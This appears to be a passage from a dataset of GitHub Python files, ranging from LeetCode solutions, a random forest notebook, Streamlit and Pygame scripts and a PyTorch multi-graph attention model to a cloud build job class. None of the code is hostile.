plt.scatter(stimulus_positions[idx_ctr,0],stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', edgecolors='black')\n #plotting the trajectory\n plt.plot(stimulus_positions[:idx_ctr+1,0],stimulus_positions[:idx_ctr+1,1],'-',\n color = 'green')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n\n \n #save figure\n plt.savefig(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'),\n facecolor='dimgray', edgecolor='none', dpi=300)\n #show the figure()\n image.setImage(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'))\n image.draw()\n win.flip()\n core.wait(fb_duration)\n \n break\n\n else:\n fixation.draw()\n win.flip()\n \n\n \n \nplt.close()\n\nwin.close()\n\n\nwith open(os.path.join(outdir,'timepoint_timing_incrementalGLM.txt'), 'w') as f:\n for item in timepoint_timing:\n f.write(\"%s\\n\" % item) \nf.close() \n\n\n\n ","repo_name":"andreagrusso/rtRSA","sub_path":"experiment/NFrun_7T_paradigm_example.py","file_name":"NFrun_7T_paradigm_example.py","file_ext":"py","file_size_in_byte":14744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44588620560","text":"class Solution:\n def reverse(self, x: int) -> int:\n negative = False\n if x < 0:\n negative = True\n x = abs(x)\n revers = int(str(x)[::-1])\n revers = revers*-1 if negative else revers\n \n return 0 if revers > 2**31-1 or revers < -2**31 else revers\n","repo_name":"Protype8/LeetCode","sub_path":"Bit Manipulation/Reverse Integer - LeetCode.py","file_name":"Reverse Integer - LeetCode.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15173177267","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[120]:\n\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nimport matplotlib.pyplot as plt\nimport mglearn\nimport random\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"./data/breast-cancer.data\", header=None)\ndf = df.rename(columns={\n 0: \"Label\", \n 1: \"Age\", \n 2: \"Menopause\",\n 3: \"Tumor Size\",\n 4: \"Inv Nodes\",\n 5: \"Node Caps\",\n 6: \"Malignance Degree\",\n 7: \"Breast\",\n 8: \"Breast Quadrant\",\n 9: \"Irradiated\"\n})\ndf.head(15)\n\n\n# In[3]:\n\n\ndf = df[df[\"Breast Quadrant\"] != \"?\"]\ndf = df[df[\"Node Caps\"] != \"?\"]\n\n\ndef get_label(label):\n if label == \"no-recurrence-events\":\n return 1\n return 0\n\n\ndef get_age(age_range):\n return int(age_range.split(\"-\")[0])\n\n\ndef get_menopause(menopause):\n if menopause == \"premeno\":\n return 1\n elif menopause == \"ge40\":\n return 2\n else:\n return 3\n\n\ndef get_tumor_size(size_range):\n return int(size_range.split(\"-\")[1])\n\n\ndef get_inv_nodes(inv_range):\n return int(inv_range.split(\"-\")[1])\n \n \ndef get_node_caps(caps):\n if caps == \"yes\":\n return 1\n else:\n return 0\n \n\ndef get_breast(breast):\n if breast == \"left\":\n return 1\n else:\n return 0\n \n\ndef get_breast_quad(quad):\n if quad == \"left_low\":\n return 1\n elif quad == \"left_up\":\n return 2\n elif quad == \"right_low\":\n return 3\n elif quad == \"right_up\":\n return 4\n else:\n return 5\n \n \ndef get_irradiated(irr):\n if irr == \"yes\":\n return 1\n else:\n return 0\n\n \ndf[\"Label\"] = df[\"Label\"].apply(lambda x: get_label(x))\ndf[\"Age\"] = df[\"Age\"].apply(lambda x: get_age(x))\ndf[\"Menopause\"] = df[\"Menopause\"].apply(lambda x: get_menopause(x))\ndf[\"Tumor 
Size\"] = df[\"Tumor Size\"].apply(lambda x: get_tumor_size(x))\ndf[\"Inv Nodes\"] = df[\"Inv Nodes\"].apply(lambda x: get_inv_nodes(x))\ndf[\"Node Caps\"] = df[\"Node Caps\"].apply(lambda x: get_node_caps(x))\ndf[\"Breast\"] = df[\"Breast\"].apply(lambda x: get_breast(x))\ndf[\"Breast Quadrant\"] = df[\"Breast Quadrant\"].apply(lambda x: get_breast(x))\ndf[\"Irradiated\"] = df[\"Irradiated\"].apply(lambda x: get_irradiated(x))\ndf.head(15)\n\n\n# In[4]:\n\n\ndf_X = df.drop(\"Label\", axis=1)\ndf_y = df[\"Label\"]\nX, y = df_X.to_numpy(), df_y.to_numpy()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify=df_y, random_state=42)\nX_train.shape\n\n\n# In[60]:\n\n\ndef train_and_validate(depth=1, seed=42):\n forest = RandomForestClassifier(n_estimators=5, random_state=seed, max_depth=depth)\n forest.fit(X_train, y_train)\n\n y_pred = forest.predict(X_test)\n total = X_test.shape[0]\n accuracy = (100 * ((y_test == y_pred).sum() / total))\n return accuracy\n\n\n# In[113]:\n\n\naccuracies = [train_and_validate(depth=i) for i in range(1, 11)]\n\n\n# In[114]:\n\n\nx_values = [i for i in range(1, 11)]\naccuracy_max = max(accuracies)\nx_pos = accuracies.index(accuracy_max)\nx_max = x_values[x_pos]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(x_values, accuracies)\nplt.xticks(x_values)\nplt.xlabel(\"Max depth\")\nplt.ylabel(\"Accuracy\")\nax.set_ylim(70, 83)\n\nax.annotate(f'accuracy = {accuracy_max:.2f}%', xy=(x_max, accuracy_max), xytext=(x_max - 1.3, accuracy_max + 0.5))\n\n# plt.savefig(\"./images/rf_accuracies\")\nplt.show()\n\n\n# In[126]:\n\n\nmain_list = []\nrandom_state = [random.randint(2, 50) for i in range(8)]\nprint(random_state)\n\nfor seed in random_state:\n outer_loop = []\n for depth in range(1, 11):\n outer_loop.append(train_and_validate(depth=depth, seed=seed))\n main_list.append(outer_loop)\n\n\n# In[131]:\n\n\nfig, axes = plt.subplots(2, 4, figsize=(20, 10))\n\na = 0\nfor i in range(2):\n for j in range(4):\n axes[i, j].plot(x_values, main_list[a])\n axes[i, j].set_title(f\"Dataset {a + 1}, seed = {random_state[a]}\")\n axes[i, j].set_xticks(x_values)\n axes[i, j].set_xlabel(\"Max depth\")\n axes[i, j].set_ylabel(\"Accuracy\")\n a = a + 1\n\nplt.subplots_adjust(hspace=0.4, wspace=0.3)\nplt.savefig(\"./images/rf_accuracies_8_datasets\")\nplt.show()\n\n\n# In[132]:\n\n\nmax_accuracies = [max(acc) for acc in main_list]\n\nplt.plot(x_values[:8], max_accuracies)\nplt.xticks(x_values[:8])\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Max depth\")\nplt.title(\"Max accuracy for each dataset\")\nplt.show()\n\nmax(max_accuracies)\n\n\n# In[64]:\n\n\n#fig, axes = plt.subplots(2, 3, figsize=(20, 10))\n#for i, (ax, tree) in enumerate(zip(axes.ravel(), forest.estimators_)):\n# ax.set_title(f\"Tree {i}\")\n# mglearn.plots.plot_tree_partition(X_train, y_train, tree, ax=ax)\n#\n#mglearn.plots.plot_2d_separator(forest, X_train, fill=True, ax=axes[-1, -1], alpha=.4)\n#axes[-1, -1].set_title(\"Random Forest\")\n#mglearn.discrete_scatter(X_train[:, 0], X_train[:, -1], y_train)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"cristinatorp/IKT450","sub_path":"Assignments/3. 
Decision Trees/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"861825746","text":"Nilaibhsindo = input(\"Nilai Bahasa Indonesia:\")\r\nNilaiipa = input(\"Nilai IPA:\")\r\nNilaimat = input(\"Nilai Matematika:\")\r\nStatusKelulusan = \"n\"\r\nif (int(Nilaibhsindo) >= 0) and (int(Nilaiipa) >= 0) and (int(Nilaimat) >= 0):\r\n if (int(Nilaibhsindo) < 60) or (int(Nilaiipa) < 60) or (int(Nilaimat) < 70):\r\n StatusKelulusan = \"x\"\r\n else:\r\n StatusKelulusan = \"y\"\r\nif StatusKelulusan == \"x\":\r\n print(\"Status Kelulusan = TIDAK LULUS\")\r\n print(\"Sebab:\")\r\n if (int(Nilaibhsindo) < 60):\r\n print(\"Nilai Bahasa Indonesia kurang dari 60\")\r\n if (int(Nilaiipa) < 60):\r\n print(\"Nilai IPA kurang dari 60\")\r\n if (int(Nilaimat) < 70):\r\n print(\"Nilai Matematika kurang dari 70\")\r\nelif StatusKelulusan == \"y\":\r\n print(\"Status Kelulusan = LULUS\")\r\nelif StatusKelulusan == \"n\":\r\n print(\"Maaf input ada yang tidak valid\")\r\n ","repo_name":"ardenio88/Pemrograman-Terstruktur","sub_path":"Chapter 5/chapter5(1)_latihan3.py","file_name":"chapter5(1)_latihan3.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71902525241","text":"import streamlit as st\r\nimport pandas as pd\r\nimport os\r\nfrom PIL import Image\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\n\r\ndf = pd.read_csv('pub_cleaned.csv')\r\n\r\nst.title(\":red[Pub Locations🍺]\")\r\nimage = Image.open('image_1.jpg')\r\nst.image(image, use_column_width=True)\r\n\r\n\r\nlocation_type = st.selectbox(\r\n \"Select the location type:\",\r\n ('Postal Code', 'Local Authority'))\r\n\r\nif location_type == 'Postal Code':\r\n location = st.selectbox('Select the Postal Code:', df['postcode'].unique())\r\n pubs = df[df['postcode'] == location].reset_index()\r\nelse:\r\n location = st.selectbox('Select Local Authority:', df['local_authority'].unique())\r\n pubs = df[df['local_authority'] == location].reset_index()\r\nst.write(f'Total number of pubs found in the {location} are {len(pubs)}.')\r\n\r\nst.table(pubs[['name','address']])\r\n\r\nst.map(pubs[['latitude', 'longitude']])","repo_name":"Gurram-Sowmya/Pub_App","sub_path":"pages/Pub_locations.py","file_name":"Pub_locations.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32720856949","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> int:\n seen = set()\n \n for num in nums:\n if num not in seen:\n seen.add(num)\n else:\n seen.remove(num)\n return seen.pop()","repo_name":"vinija/LeetCode","sub_path":"136-single-number/136-single-number.py","file_name":"136-single-number.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"429583160","text":"\nfrom random import randint\nimport time\nimport pygame\n\n\nclass DragItem:\n\n def __init__(self, item_size, image_name, game):\n \n self.draggable = False\n self.pressed = False\n self.pos_x = 0\n self.pos_y = 0\n\n # Adding random positions to create a btf effect\n # when start game :)\n self.smooth_pos_x = randint(500*item_size, 500*item_size+500)\n self.smooth_pos_y = -randint(500*item_size, 500*item_size+500)\n if(item_size%2==0):\n self.smooth_pos_x = 
-self.smooth_pos_x\n \n\n self.game = game\n self.item_size = item_size\n self.item_image = game.assets_manager.get_asset(image_name).asset_load\n self.image_width = self.item_image.get_size()[0]\n self.image_height = self.item_image.get_size()[1]\n\n \n def draw(self):\n\n active = False\n dropped = False\n\n # Checking button status\n rect = pygame.Rect(self.pos_x, self.pos_y, self.image_width, self.image_height)\n mouse_pos = pygame.mouse.get_pos()\n mouse_down = pygame.mouse.get_pressed()[0]\n mouse_first_click = self.game.event_manager.MOUSE_LEFT_CLICK\n\n if(self.draggable):\n\n if(self.pressed and mouse_down):\n active = True\n elif(mouse_first_click):\n if(rect.collidepoint(mouse_pos)):\n self.pressed = True\n active = True\n else:\n if(self.pressed):\n dropped = True\n self.pressed = False\n \n if(active):\n self.pos_x = mouse_pos[0] - self.image_width/2\n self.pos_y = mouse_pos[1] - self.image_height/2\n\n # Smoothing\n self.smooth_pos_x = self.smooth_pos_x-(self.smooth_pos_x-self.pos_x)/8\n self.smooth_pos_y = self.smooth_pos_y-(self.smooth_pos_y-self.pos_y)/8\n\n # Rendering the item\n self.game.render.render_image(self.item_image, self.smooth_pos_x, self.smooth_pos_y)\n\n return dropped\n\n","repo_name":"dansch0/tower-of-hanoi","sub_path":"game/drag_item.py","file_name":"drag_item.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16069114038","text":"# -*- coding=utf-8 -*-\n\n\n# Get the system configuration\nfrom app.main.base.db import system as db_system\n\n\ndef system_list():\n systems = db_system.system_list()\n if systems:\n return systems\n else:\n return False\n\n\ndef system_list_put(data):\n systems = db_system.system_list()\n if systems:\n system = systems[0]\n if data.get('platform_name'):\n system.platform_name = data.get('platform_name').decode(\"utf-8\")\n if data.get('version_information'):\n system.version_information = data.get('version_information').decode(\"utf-8\")\n if data.get('copyright'):\n system.copyright = data.get('copyright').decode(\"utf-8\")\n if data.get('user_authentication_mode'):\n system.user_authentication_mode = data.get('user_authentication_mode').decode(\"utf-8\")\n if data.get('debug') == 0:\n system.debug = False\n elif data.get('debug') == 1:\n system.debug = True\n else: # 'please re-enter debug (1 means True, 0 means False)'\n return False\n db_system.system_save_db(system)\n return system\n else:\n return False\n\n\ndef system_save(system):\n return db_system.system_save_db(system)\n\n\ndef system_get(sysconfig):\n return db_system.system_get(sysconfig)","repo_name":"zhouliang0v0/naguan-kpy","sub_path":"app/main/base/control/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20048344960","text":"import torch\nfrom torch import nn\nfrom torch.nn import Sequential, Linear, Sigmoid\nimport torch.nn.functional as F\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport pandas as pd\n\nclass linear(nn.Module):\n def __init__(self, c_in, c_out):\n super(linear, self).__init__()\n self.mlp = torch.nn.Conv2d(c_in, c_out, kernel_size=(1, 1), padding=(0, 0), stride=(1, 1), bias=True)\n def forward(self, x):\n return self.mlp(x)\n\nclass conv2d_(nn.Module):\n def __init__(self, input_dims, output_dims, kernel_size, stride=(1, 1),\n padding='SAME', use_bias=True, activation=F.relu,\n bn_decay=None):\n 
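# Note on the padding math: with stride 1, 'SAME' padding needs roughly\n # (kernel - 1) / 2 zeros per side to preserve the spatial size; the\n # [1, 1] kernels built by FC below need no padding at all.\n 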
super(conv2d_, self).__init__()\n self.activation = activation\n if padding == 'SAME':\n self.padding_size = [math.ceil((ks - 1) / 2) for ks in kernel_size]\n else:\n self.padding_size = [0, 0]\n self.conv = nn.Conv2d(input_dims, output_dims, kernel_size, stride=stride,\n padding=0, bias=use_bias)\n self.batch_norm = nn.BatchNorm2d(output_dims, momentum=bn_decay)\n torch.nn.init.xavier_uniform_(self.conv.weight)\n if use_bias:\n torch.nn.init.zeros_(self.conv.bias)\n\n\n def forward(self, x):\n x = x.permute(0, 3, 2, 1)\n x = x.to('cuda:0')\n x = F.pad(x, ([self.padding_size[1], self.padding_size[1], self.padding_size[0], self.padding_size[0]]))\n x = self.conv(x)\n x = self.batch_norm(x)\n if self.activation is not None:\n x = F.relu_(x)\n return x.permute(0, 3, 2, 1)\n\n\nclass FC(nn.Module):\n def __init__(self, input_dims, units, activations, bn_decay, use_bias=True):\n super(FC, self).__init__()\n if isinstance(units, int):\n units = [units]\n input_dims = [input_dims]\n activations = [activations]\n elif isinstance(units, tuple):\n units = list(units)\n input_dims = list(input_dims)\n activations = list(activations)\n assert type(units) == list\n self.convs = nn.ModuleList([conv2d_(\n input_dims=input_dim, output_dims=num_unit, kernel_size=[1, 1], stride=[1, 1],\n padding='VALID', use_bias=use_bias, activation=activation,\n bn_decay=bn_decay) for input_dim, num_unit, activation in\n zip(input_dims, units, activations)])\n\n def forward(self, x):\n for conv in self.convs:\n x = conv(x)\n return x\n\n\nclass SGEmbedding(nn.Module):\n \"\"\"\n multi-graph spatial embedding\n SE: [num_vertices, D]\n GE: [num_vertices, num_graphs, 1]\n D: output dims = M * d\n return: [num_vertices, num_graphs, num_vertices, D]\n \"\"\"\n def __init__(self, D, bn_decay):\n super(SGEmbedding, self).__init__()\n self.FC_se = FC(\n input_dims=[D, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay)\n\n self.FC_ge = FC(\n input_dims=[5, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay) # input_dims = graph_nums\n\n def forward(self, SE, GE):\n # spatial embedding\n SE = SE.unsqueeze(0).unsqueeze(0)\n SE = self.FC_se(SE)\n # multi-graph embedding\n graph_embbeding = torch.empty(GE.shape[0], GE.shape[1], 5)\n for i in range(GE.shape[0]):\n graph_embbeding[i] = F.one_hot(GE[..., 0][i].to(torch.int64) % 5, 5)\n GE = graph_embbeding\n GE = GE.unsqueeze(dim=2)\n GE = self.FC_ge(GE)\n del graph_embbeding\n return SE + GE\n\n\nclass spatialAttention(nn.Module):\n '''\n spatial attention mechanism\n X: [num_vertices, num_graphs, num_vertices, D]\n SGE: [num_vertices, num_graphs, num_vertices, D]\n M: number of attention heads\n d: dimension of each attention outputs\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n def __init__(self, M, d, bn_decay):\n super(spatialAttention, self).__init__()\n self.d = d\n self.M = M\n D = self.M * self.d\n self.FC_q = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_k = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_v = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC = FC(input_dims=D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n\n def forward(self, X, SGE):\n num_vertex = X.shape[0]\n X = torch.cat((X, SGE), dim=-1) \n # [num_vertices, num_graphs, num_vertices, 2 * D]\n\n query = self.FC_q(X)\n key = self.FC_k(X)\n value = self.FC_v(X) # [M * num_vertices, num_graphs, num_vertices, d]\n\n query = torch.cat(torch.split(query, self.M, dim=-1), dim=0)\n key = 
torch.cat(torch.split(key, self.M, dim=-1), dim=0)\n value = torch.cat(torch.split(value, self.M, dim=-1), dim=0)\n\n attention = torch.matmul(query, key.transpose(2, 3))\n attention /= (self.d ** 0.5)\n attention = F.softmax(attention, dim=-1)\n\n X = torch.matmul(attention, value)\n X = torch.cat(torch.split(X, num_vertex, dim=0), dim=-1)\n X = self.FC(X)\n del query, key, value, attention\n return X\n\n\nclass graphAttention(nn.Module):\n '''\n multi-graph attention mechanism\n X: [num_vertices, num_graphs, num_vertices, D]\n SGE: [num_vertices, num_graphs, num_vertices, D]\n M: number of attention heads\n d: dimension of each attention outputs\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n def __init__(self, M, d, bn_decay, mask=True):\n super(graphAttention, self).__init__()\n self.d = d\n self.M = M\n D = self.M * self.d\n self.mask = mask\n self.FC_q = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_k = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_v = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC = FC(input_dims=D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n\n def forward(self, X, SGE):\n num_vertex_ = X.shape[0]\n X = torch.cat((X, SGE), dim=-1)\n # [num_vertices, num_graphs, num_vertices, 2 * D]\n\n query = self.FC_q(X)\n key = self.FC_k(X)\n value = self.FC_v(X)\n\n query = torch.cat(torch.split(query, self.M, dim=-1), dim=0)\n key = torch.cat(torch.split(key, self.M, dim=-1), dim=0)\n value = torch.cat(torch.split(value, self.M, dim=-1), dim=0) \n # [M * num_vertices, num_graphs, num_vertices, d]\n\n query = query.permute(0, 2, 1, 3)\n key = key.permute(0, 2, 3, 1)\n value = value.permute(0, 2, 1, 3)\n\n attention = torch.matmul(query, key)\n attention /= (self.d ** 0.5)\n\n if self.mask:\n num_vertex = X.shape[0]\n num_step = X.shape[1]\n mask = torch.ones(num_step, num_step)\n mask = torch.tril(mask)\n mask = torch.unsqueeze(torch.unsqueeze(mask, dim=0), dim=0)\n mask = mask.repeat(self.M * num_vertex, num_vertex, 1, 1)\n mask = mask.to(torch.bool)\n attention = torch.where(mask, attention, -2 ** 15 + 1)\n\n attention = F.softmax(attention, dim=-1)\n\n X = torch.matmul(attention, value)\n X = X.permute(0, 2, 1, 3)\n X = torch.cat(torch.split(X, num_vertex_, dim=0), dim=-1)\n X = self.FC(X)\n del query, key, value, attention\n return X\n\n\nclass gatedFusion(nn.Module):\n '''\n gated fusion\n HS: [num_vertices, num_graphs, num_vertices, D]\n HG: [num_vertices, num_graphs, num_vertices, D]\n D: output dims = M * d\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n\n def __init__(self, D, bn_decay):\n super(gatedFusion, self).__init__()\n self.FC_xs = FC(input_dims=D, units=D, activations=None,\n bn_decay=bn_decay, use_bias=False)\n self.FC_xt = FC(input_dims=D, units=D, activations=None,\n bn_decay=bn_decay, use_bias=True)\n self.FC_h = FC(input_dims=[D, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay)\n\n def forward(self, HS, HG):\n XS = self.FC_xs(HS)\n XG = self.FC_xt(HG)\n z = torch.sigmoid(torch.add(XS, XG))\n H = torch.add(torch.mul(z, HS), torch.mul(1 - z, HG))\n H = self.FC_h(H)\n del XS, XG, z\n return H\n\n\nclass STAttBlock(nn.Module):\n def __init__(self, M, d, bn_decay, mask=False):\n super(STAttBlock, self).__init__()\n self.spatialAttention = spatialAttention(M, d, bn_decay)\n self.graphAttention = graphAttention(M, d, bn_decay, mask=mask)\n self.gatedFusion = gatedFusion(M * d, bn_decay)\n\n def forward(self, 
X, SGE):\n HS = self.spatialAttention(X, SGE)\n HT = self.graphAttention(X, SGE)\n H = self.gatedFusion(HS, HT)\n del HS, HT\n return torch.add(X, H)\n\nclass FusionGraphModel(nn.Module):\n def __init__(self, graph, gpu_id, conf_graph, conf_data, M, d, bn_decay):\n super(FusionGraphModel, self).__init__()\n self.M = M\n self.d = d\n self.bn_decay = bn_decay\n D = self.M * self.d\n self.SG_ATT = STAttBlock(M, d, bn_decay)\n self.SGEmbedding = SGEmbedding(D, bn_decay)\n\n self.FC_1 = FC(input_dims=[1, D], units=[D, D], activations=[F.relu, None],\n bn_decay=self.bn_decay)\n self.FC_2 = FC(input_dims=[D, D], units=[D, 1], activations=[F.relu, None],\n bn_decay=self.bn_decay)\n\n self.graph = graph\n self.matrix_w = conf_graph['matrix_weight']\n # matrix_weight: if True, turn the weight matrices trainable. \n self.attention = conf_graph['attention']\n # attention: if True, the SG-ATT is used.\n self.task = conf_data['type']\n\n device = 'cuda:%d' % gpu_id\n\n if self.graph.graph_num == 1:\n self.fusion_graph = False\n self.A_single = self.graph.get_graph(graph.use_graph[0])\n else:\n self.fusion_graph = True\n self.softmax = nn.Softmax(dim=1)\n\n if self.matrix_w:\n adj_w = nn.Parameter(torch.randn(self.graph.graph_num, self.graph.node_num, self.graph.node_num))\n adj_w_bias = nn.Parameter(torch.randn(self.graph.node_num, self.graph.node_num))\n self.adj_w_bias = nn.Parameter(adj_w_bias.to(device), requires_grad=True)\n self.linear = linear(5, 1)\n\n else:\n adj_w = nn.Parameter(torch.randn(1, self.graph.graph_num))\n\n self.adj_w = nn.Parameter(adj_w.to(device), requires_grad=True)\n self.used_graphs = self.graph.get_used_graphs()\n assert len(self.used_graphs) == self.graph.graph_num\n\n def forward(self):\n\n if self.graph.fix_weight:\n return self.graph.get_fix_weight()\n \n # SE = torch.from_numpy(np.float32(pd.read_csv(r'data\\SE\\se_parking.csv', header=None).values)).to('cuda:0')\n SE = torch.from_numpy(np.float32(pd.read_csv('data\\\\SE\\\\se_pm25.csv', header=None).values)).to('cuda:0')\n # load spatial embedding\n\n if self.fusion_graph:\n if not self.matrix_w:\n self.A_w = self.softmax(self.adj_w)[0]\n adj_list = [self.used_graphs[i] * self.A_w[i] for i in range(self.graph.graph_num)]\n self.adj_for_run = torch.sum(torch.stack(adj_list), dim=0) \n # create a graph stack\n\n else:\n if self.attention:\n W = torch.stack((self.used_graphs))\n GE = W[:,:,0].permute(1, 0).unsqueeze(dim=2)\n # generate graph embbeding\n\n SGE = self.SGEmbedding(SE, GE)\n W = self.FC_1(torch.unsqueeze(W.permute(1, 0, 2), -1))\n W = self.SG_ATT(W, SGE) \n # multi-graph spatial attention\n\n W = self.FC_2(W).squeeze(dim=-1)\n W = torch.sum(self.adj_w * W.permute(1, 0, 2), dim=0)\n\n else:\n W= torch.sum(self.adj_w * torch.stack(self.used_graphs), dim=0)\n act = nn.ReLU()\n W = act(W)\n self.adj_for_run = W\n\n else:\n self.adj_for_run = self.A_single\n\n return self.adj_for_run\n","repo_name":"swsamleo/MLSTGCN","sub_path":"models/fusiongraph.py","file_name":"fusiongraph.py","file_ext":"py","file_size_in_byte":12748,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"40"} +{"seq_id":"74192130680","text":"import numpy as np\n\ndef straight_line_path_planning(q,ps,n_p,n_timesteps):\n\t\"\"\"\n\t\tq: Current location of the target.\n\t\tps: Current locations of the mobile sensors.\n\t\tn_p: The number of sensors\n\t\tn_timesteps: The number of timesteps to plan ahead. 
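Each step moves every sensor by a fixed 1/n_timesteps fraction of its initial offset from the target, so all sensors arrive at q on the final waypoint.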
\n\t\t----------------------------------------------------------------------------------------\n\t\tOutput: waypoints for each mobile sensor, Shape= (num_time_steps,num_sensors,2)\n\t\"\"\"\n\n\n\tp_trajs=[]\n\n\tq=q.reshape(-1,2)\n\tps=ps.reshape(-1,2)\n\n\tdirection = -(ps-q)\n\tdirection = (direction.T/n_timesteps).T\n\n\tfor i in range(n_timesteps):\n\t\tps= ps + direction\n\t\tp_trajs.append(ps)\n\n\treturn np.array(p_trajs).reshape(-1,n_p,2) # Shape= (num_time_steps,num_sensors,2)\n\n","repo_name":"lina-robotics-lab/fim_track","sub_path":"src/utils/StraightLinePathPlanning.py","file_name":"StraightLinePathPlanning.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73628393399","text":"class Job(object):\n\n    def __init__(self, uuid=None, createdAt=None, updatedAt=None, name=None, codeType=None, codeRepoUrl=None, codeRepoUrlLabel=None, codeRepoBranch=None, createUserName=None, codeRepoPrivate=None, createUserPin=None, ossPath=None, ossHost=None, ossBucket=None, buildImage=None, buildImageLabel=None, isUserBuildSetConfig=None, buildSetConfig=None, buildTimeOut=None, buildResourceCpu=None, buildResourceMem=None, noticeMail=None, noticeType=None, compilerType=None, dockerRegistry=None, dockerRepository=None, dockerRegistryUri=None):\n        \"\"\"\n        :param uuid: (Optional) UUID of the build job\n        :param createdAt: (Optional) creation timestamp\n        :param updatedAt: (Optional) time of the last update\n        :param name: (Optional) name of the build\n        :param codeType: (Optional) code hosting type; currently only github is supported\n        :param codeRepoUrl: (Optional) clone URL of the code\n        :param codeRepoUrlLabel: (Optional) display label for the code name\n        :param codeRepoBranch: (Optional) branch\n        :param createUserName: (Optional) creator\n        :param codeRepoPrivate: (Optional) whether the repository is private\n        :param createUserPin: (Optional) last updater\n        :param ossPath: (Optional) user cloud-storage path; if empty, the shared cloud storage is used\n        :param ossHost: (Optional) user cloud-storage host, i.e. the region where the user's storage lives\n        :param ossBucket: (Optional) user cloud-storage bucket; if empty, the shared cloud storage is used\n        :param buildImage: (Optional) address of the build image\n        :param buildImageLabel: (Optional) display label for the build image\n        :param isUserBuildSetConfig: (Optional) whether the build steps are configured on the page; if true, buildSetConfig must be filled in, and if false, buildSetConfig is ignored even when it has content\n        :param buildSetConfig: (Optional) see the description of isUserBuildSetConfig\n        :param buildTimeOut: (Optional) timeout, in seconds\n        :param buildResourceCpu: (Optional) number of CPU cores allocated\n        :param buildResourceMem: (Optional) amount of memory allocated, in MB\n        :param noticeMail: (Optional) notification email address\n        :param noticeType: (Optional) notification frequency: MAIL_FAILED notifies on failure, MAIL_EVERY notifies on every build\n        :param compilerType: (Optional) build type\n        :param dockerRegistry: (Optional) image registry name\n        :param dockerRepository: (Optional) image repository name\n        :param dockerRegistryUri: (Optional) URI of the registry\n        \"\"\"\n\n        self.uuid = uuid\n        self.createdAt = createdAt\n        self.updatedAt = updatedAt\n        self.name = name\n        self.codeType = codeType\n        self.codeRepoUrl = codeRepoUrl\n        self.codeRepoUrlLabel = codeRepoUrlLabel\n        self.codeRepoBranch = codeRepoBranch\n        self.createUserName = createUserName\n        self.codeRepoPrivate = codeRepoPrivate\n        self.createUserPin = createUserPin\n        self.ossPath = ossPath\n        self.ossHost = ossHost\n        self.ossBucket = ossBucket\n        self.buildImage = buildImage\n        self.buildImageLabel = buildImageLabel\n        self.isUserBuildSetConfig = isUserBuildSetConfig\n        self.buildSetConfig = buildSetConfig\n        self.buildTimeOut = buildTimeOut\n        self.buildResourceCpu = buildResourceCpu\n        self.buildResourceMem = buildResourceMem\n        self.noticeMail = noticeMail\n        self.noticeType = noticeType\n        self.compilerType = compilerType\n        self.dockerRegistry = dockerRegistry\n        
